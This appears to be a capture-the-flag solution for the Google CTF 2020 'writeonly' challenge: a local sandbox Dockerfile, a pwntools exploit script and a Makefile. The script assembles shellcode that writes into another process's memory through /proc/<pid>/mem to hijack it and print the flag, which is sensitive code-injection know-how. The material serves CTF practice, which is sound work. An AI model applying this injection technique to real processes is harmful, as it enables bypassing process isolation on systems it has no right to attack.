Alternative attempt at the Google CTF 2020 "writeonly" challenge: a Dockerfile for a local sandbox, the exploit script (doit.py), and a Makefile with helper targets.
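# syntax=docker/dockerfile:1
# Local sandbox for the Google CTF 2020 "writeonly" challenge.
#
# Layout: the challenge binary and the flag live in /home/user, owned by root,
# and the service runs as the unprivileged user `user` behind socat (one
# `chal` process per connection). The flag is deliberately world-readable
# (0444) and the directory is read-only for `user`: the challenge relies on
# the chal process itself constraining what the attacker's shellcode may do
# (the exploit script assumes the child, not the parent, can read files),
# not on file permissions.
FROM ubuntu:20.04

# `apt-get upgrade` is kept from the original recipe so the sandbox tracks the
# patched Ubuntu userland; it does make the build non-deterministic. Pin the
# base image by digest if the image must be reproducible.
RUN apt-get update \
    && apt-get upgrade -y \
    && apt-get install -y --no-install-recommends socat \
    && rm -rf /var/lib/apt/lists/*

# Fixed numeric UID/GID so file ownership and `USER` are stable across rebuilds.
RUN set -e -x \
    && groupadd -g 1337 user \
    && useradd -g 1337 -u 1337 -m user

# Challenge binary (from the CTF attachments) and the flag to protect.
COPY attachments/chal /home/user/
COPY flag /home/user/

# Everything under /home/user is root-owned: the binary is executable but not
# writable, the flag readable but not writable, and `user` cannot create files
# in its own home (including the skeleton dotfiles useradd -m dropped there).
RUN set -e -x \
    && chown -R root:root /home/user \
    && chmod 555 /home/user \
    && chmod 555 /home/user/chal \
    && chmod 444 /home/user/flag

# Drop privileges before the service starts; nothing below needs root.
USER user
WORKDIR /home/user

# Documentation only: the port is published on loopback by `docker run` in
# the Makefile. The listener is an unauthenticated code-execution endpoint,
# so never publish it on a non-loopback address.
EXPOSE 1337

# Exec form so socat is PID 1 and receives SIGTERM from `docker stop`
# (shell form would leave `sh -c` as PID 1 and not forward the signal).
# `fork` spawns a fresh chal per connection; `reuseaddr` allows fast restarts.
CMD ["socat", "TCP-LISTEN:1337,reuseaddr,fork", "EXEC:./chal"]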
from pwn import remote
import pwnlib
import os
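# --- configuration ---------------------------------------------------------
# Local copy of the challenge binary. It is used only for ELF metadata
# (arch/bits/endianness for shellcraft) and for the `check_flag` symbol
# address. NOTE: the Dockerfile copies the binary from attachments/chal;
# keep the two paths pointing at the same build, or the symbol address
# and loop offset below will be wrong.
BINARY = os.environ.get('CHAL_BINARY', 'src/chal')
HOST = os.environ.get('CHAL_HOST', '127.0.0.1')
PORT = int(os.environ.get('CHAL_PORT', '1337'))
# Path of the flag as seen from inside the container (see the Dockerfile).
FLAG_PATH = '/home/user/flag'
# Offset of the infinite loop inside check_flag, read off
# `objdump --disassemble=check_flag src/chal` (<check_flag+0x8>). It is
# specific to this build of the binary; re-derive it if the binary changes.
LOOP_OFFSET = 0x8

# automatically set the binary type (arch, bits, endianness) for asm/shellcraft
pwnlib.context.context.binary = BINARY


def build_payload(child_pid):
    """Assemble the shellcode run by the (restricted) parent process.

    The parent cannot read the flag itself, so it opens /proc/<child_pid>/mem
    for writing, seeks to the child's busy loop inside check_flag and
    overwrites it with code that cat()s the flag to stdout and then crashes.
    Writing to /proc/<pid>/mem bypasses page protections (the text segment is
    r-x), which is what makes patching the running child possible.

    Args:
        child_pid: PID of the forked child, as printed by the challenge.

    Returns:
        bytes: machine code for the parent; ends in an infinite loop so the
        parent stays alive while the child prints the flag.

    Assumes the binary is not PIE: symbols['check_flag'] is used directly as
    the virtual address to seek to (TODO confirm against `checksec`).
    """
    # Code injected into the child: dump the flag to fd 1, then crash.
    injection = pwnlib.asm.asm(
        pwnlib.shellcraft.cat(FLAG_PATH, 1) + pwnlib.shellcraft.crash()
    )
    target = pwnlib.context.context.binary.symbols['check_flag'] + LOOP_OFFSET

    # open("/proc/<pid>/mem", O_WRONLY) -> fd in rax; keep it in r12 (callee-saved).
    payload = pwnlib.shellcraft.open("/proc/{}/mem".format(child_pid), os.O_WRONLY)
    payload += pwnlib.shellcraft.mov('r12', 'rax')
    # lseek(fd, <address of the loop>, SEEK_SET)
    payload += pwnlib.shellcraft.syscall('SYS_lseek', 'r12', target, os.SEEK_SET)
    # Push the injected code onto the stack and write(fd, rsp, len) it into
    # the child. pushstr NUL-terminates/pads, but only len(injection) bytes
    # are written, so the child's code after the loop is untouched.
    payload += pwnlib.shellcraft.pushstr(injection)
    payload += pwnlib.shellcraft.write('r12', 'rsp', len(injection))
    return pwnlib.asm.asm(payload + pwnlib.shellcraft.infloop())


def main():
    """Connect to the service, deliver the shellcode and print the child's output."""
    r = remote(HOST, PORT)
    try:
        # The service leaks the child's PID in a debug line; int() rejects
        # anything that is not a plain number, so the remote value cannot
        # smuggle characters into the /proc path built above.
        r.recvuntil(b'[DEBUG] child pid: ')
        child_pid = int(r.recvline())
        payload = build_payload(child_pid)
        # Bytes throughout: newer pwntools versions warn on (or reject) str.
        r.sendlineafter(b'shellcode length? ', str(len(payload)).encode())
        r.sendafter(b'bytes of shellcode. ', payload)
        # Print whatever the child writes (the flag) until the connection
        # closes; the original loop raised EOFError at that point.
        try:
            while True:
                print(r.recvline())
        except EOFError:
            pass
    finally:
        r.close()


if __name__ == '__main__':
    main()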
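# Helpers for building/running the local "writeonly" sandbox and the exploit.
# Every target is an action, not a file: declare them phony so that a stray
# file named e.g. `build` or `stop` does not silently turn the target into
# an "up to date" no-op.
.PHONY: doit build start stop disass

# Overridable from the command line, e.g. `make PYTHON=python3 doit`.
PYTHON ?= python
IMAGE  ?= sandbox-writeonly
CHAL   ?= src/chal

# Run the exploit against the container started by `make start`.
doit:
	$(PYTHON) doit.py

# Build the sandbox image from the Dockerfile in this directory.
build:
	docker build -t $(IMAGE) .

# Publish the port on loopback only: the service hands arbitrary shellcode
# to a process, so it must never be reachable from other hosts.
start:
	docker run --rm --name $(IMAGE) -p 127.0.0.1:1337:1337 $(IMAGE)

stop:
	docker stop $(IMAGE)

# Disassemble check_flag to (re)derive the loop offset used by doit.py.
# `--disassemble=<symbol>` needs a reasonably recent binutils.
disass:
	objdump --disassemble=check_flag $(CHAL)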